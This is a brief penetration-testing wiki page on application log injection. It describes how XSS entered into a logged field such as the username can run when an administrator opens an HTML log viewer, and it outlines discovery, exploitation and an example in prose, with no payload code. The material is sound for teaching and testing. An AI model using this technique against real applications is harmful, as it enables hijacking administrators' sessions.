Application Log Injection

Overview Application Log Injection may result when application logs store user input and possess client-vulnerabilities such as XSS. For example, if application logs are stored in HTML format and viewed in a browser, then XSS vulnerabilities in the log viewer could allow execution of the XSS. Discovery Methodology To discover vulnerabilities in the log viewer, it may be best to download and install a copy of the target application locally, then use standard techniques to test the application. Exploitation Cross site scripting tends to be the easiest and most prevalent vulnerability in HTML based application log viewers. Send hooks and other XSS into the logs. Wait for an administrator to view the logs. Example The user name entered on the login page is logged to the application log. Enter a cross-site script in the user name field. Visit the View Log page. Check that the XSS works. Videos Warning: Could not reach YouTube via network connection. Failed to embed video. Click here to watch Sending Persistent Cross-site Scripts into Web Logs to Snag Web Admin